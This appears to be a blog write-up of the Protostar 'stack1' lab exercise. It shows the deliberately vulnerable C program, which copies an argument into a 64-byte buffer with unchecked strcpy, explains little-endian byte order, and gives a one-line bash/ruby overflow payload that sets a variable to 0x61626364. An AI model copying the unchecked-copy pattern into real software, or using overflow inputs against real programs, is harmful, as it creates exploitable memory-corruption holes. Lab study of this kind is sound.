$$\ $$\ $$\ $$ | $$ | $$ | $$$$$$$\ $$ | $$$$$$\ $$$$$$\ $$$$$$$$\ $$ | $$$$$$\ $$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ __$$\ $$ |$$ __$$\ $$ __$$\ \____$$ |$$ |$$ __$$\ $$ | $$ | $$ |$$ __$$\ \____$$\ $$ _$$ _$$\ $$ | $$ |$$ |$$ / $$ |$$ / $$ | $$$$ _/ $$ |$$ / $$ |$$ | $$ | $$ |$$ | \__|$$$$$$$ |$$ / $$ / $$ | $$ | $$ |$$ |$$ | $$ |$$ | $$ | $$ _/ $$ |$$ | $$ |$$ | $$ | $$ |$$ | $$ __$$ |$$ | $$ | $$ | $$$$$$$ |$$ |\$$$$$$ |\$$$$$$$ |$$\ $$$$$$$$\ $$ |\$$$$$$ |\$$$$$\$$$$ |$$ | $$\\$$$$$$$ |$$ | $$ | $$ | \_______/ \__| \______/ \____$$ |\__|\________|\__| \______/ \_____\____/ \__| \__|\_______|\__| \__| \__| $$\ $$ | \$$$$$$ | \______/
In this second exercise we are asked again to overwrite the variable “modified” in order to get the “good boy” message. This time, though, we have to overwrite it with a specific value: 0x61626364.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
The stack layout is the same as in stack0, so then again we need to stuff 64 bytes into “buffer”, plus the 4 bytes of the hex value.
The point of this exercise is to take into account the endianess, and overwrite “modified” with the proper byte ordering, to have the value correctly set in the stack. Therefore, knowing that the arch of protostar is 686, we know it is little endian. Easy, isn’t it? :)
Again, we will use bash and ruby to write the solution:
#!/bin/bash
./stack1 $(ruby -e ' puts "A"*64 + "\x64\x63\x62\x61" ')